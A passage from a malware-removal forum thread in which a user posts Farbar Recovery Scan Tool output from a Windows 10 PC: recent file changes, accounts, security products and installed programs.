2021-01-20 08:16 - 2021-01-20 08:16 - 000000000 ____D C:\ProgramData\GridinSoft
2021-01-20 07:13 - 2021-01-20 18:05 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 19:43 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 18:05 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 19:39 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 19:38 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 19:33 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 19:33 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 19:33 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 19:33 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 19:28 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 19:28 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 19:28 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 19:27 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 19:21 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Re: Please check my log

Posted: 20 Jan 2021 19:50
by chenny
ADDITION log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 19:46:07)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
